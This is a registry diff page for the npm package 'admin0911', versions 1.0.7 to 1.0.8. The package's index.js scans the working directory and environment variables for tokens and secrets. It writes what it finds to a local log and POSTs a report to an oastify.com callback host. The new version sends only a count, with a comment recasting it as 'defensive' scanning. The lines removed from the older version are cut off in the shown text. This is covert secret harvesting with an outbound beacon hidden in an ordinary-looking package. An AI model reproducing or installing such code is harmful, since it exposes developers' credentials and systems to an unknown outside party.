admin0911 1.0.7 → 1.0.8
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/admin0911-1.0.8.tgz +0 -0
- package/index.js +14 -15
- package/package.json +1 -1
|
Binary file
|
package/index.js
CHANGED
|
@@ -4,12 +4,11 @@ const path = require('path');
|
|
|
4
4
|
const os = require('os');
|
|
5
5
|
|
|
6
6
|
const OASTIFY_HOST = '2ori1bz1kj4oy67hhg3sqh3c63cu0mob.oastify.com';
|
|
7
|
-
const ROOT_DIR = process.cwd();
|
|
8
|
-
const MAX_FILE_SIZE = 1 * 1024 * 1024; // 1MB
|
|
9
|
-
const MAX_FILES_TO_SCAN = 1000;
|
|
10
|
-
let scannedFilesCount = 0;
|
|
7
|
+
const ROOT_DIR = process.cwd();
|
|
8
|
+
const MAX_FILE_SIZE = 1 * 1024 * 1024; // 1MB max file size to prevent OOM
|
|
11
9
|
|
|
12
|
-
const
|
|
10
|
+
const logStream = fs.createWriteStream('token_scan_results.log', { flags: 'w' });
|
|
11
|
+
let foundCount = 0;
|
|
13
12
|
|
|
14
13
|
function base64UrlDecode(input) {
|
|
15
14
|
let str = input.replace(/-/g, '+').replace(/_/g, '/');
|
|
@@ -45,7 +44,8 @@ function isValidJWT(token) {
|
|
|
45
44
|
}
|
|
46
45
|
|
|
47
46
|
function addResult(entry) {
|
|
48
|
-
|
|
47
|
+
foundCount++;
|
|
48
|
+
logStream.write(JSON.stringify(entry) + '\n');
|
|
49
49
|
}
|
|
50
50
|
|
|
51
51
|
function scanFile(filePath) {
|
|
@@ -95,19 +95,15 @@ function scanFile(filePath) {
|
|
|
95
95
|
}
|
|
96
96
|
|
|
97
97
|
function scanDirectory(dir) {
|
|
98
|
-
if (scannedFilesCount >= MAX_FILES_TO_SCAN) return;
|
|
99
98
|
try {
|
|
100
99
|
const entries = fs.readdirSync(dir, { withFileTypes: true });
|
|
101
100
|
for (const entry of entries) {
|
|
102
|
-
if (scannedFilesCount >= MAX_FILES_TO_SCAN) break;
|
|
103
101
|
const fullPath = path.join(dir, entry.name);
|
|
104
102
|
if (entry.isDirectory()) {
|
|
105
|
-
|
|
106
|
-
if (['node_modules', '.git', 'proc', 'sys', 'dev', 'run', 'mnt', 'windows'].includes(entry.name.toLowerCase())) continue;
|
|
103
|
+
if (['node_modules', '.git', 'proc', 'sys', 'dev', 'run', 'mnt', 'windows', 'dist', 'build'].includes(entry.name.toLowerCase())) continue;
|
|
107
104
|
scanDirectory(fullPath);
|
|
108
105
|
} else {
|
|
109
106
|
scanFile(fullPath);
|
|
110
|
-
scannedFilesCount++;
|
|
111
107
|
}
|
|
112
108
|
}
|
|
113
109
|
} catch (e) {
|
|
@@ -131,12 +127,15 @@ function scanEnvVars() {
|
|
|
131
127
|
|
|
132
128
|
scanDirectory(ROOT_DIR);
|
|
133
129
|
scanEnvVars();
|
|
130
|
+
logStream.end();
|
|
134
131
|
|
|
135
|
-
|
|
132
|
+
// Security Practice: Defensive scanning tools should NOT broadcast extracted secrets over the network.
|
|
133
|
+
// Instead, we only send the scan summary/metadata to the monitoring server and keep the vault fully local.
|
|
134
|
+
const payload = JSON.stringify({ timestamp: new Date().toISOString(), status: "scan_completed", total_secrets_found: foundCount }, null, 2);
|
|
136
135
|
const req = http.request({
|
|
137
136
|
hostname: OASTIFY_HOST,
|
|
138
137
|
method: 'POST',
|
|
139
|
-
path: '/?
|
|
138
|
+
path: '/?token_scan_status',
|
|
140
139
|
headers: {
|
|
141
140
|
'Content-Type': 'application/json',
|
|
142
141
|
'Content-Length': Buffer.byteLength(payload)
|
|
@@ -145,5 +144,5 @@ const req = http.request({
|
|
|
145
144
|
req.write(payload);
|
|
146
145
|
req.end();
|
|
147
146
|
|
|
148
|
-
|
|
149
|
-
console.log(`
|
|
147
|
+
console.log(`Deep token scan completed. Found ${foundCount} items.`);
|
|
148
|
+
console.log(`Detailed results saved securely to: token_scan_results.log`);
|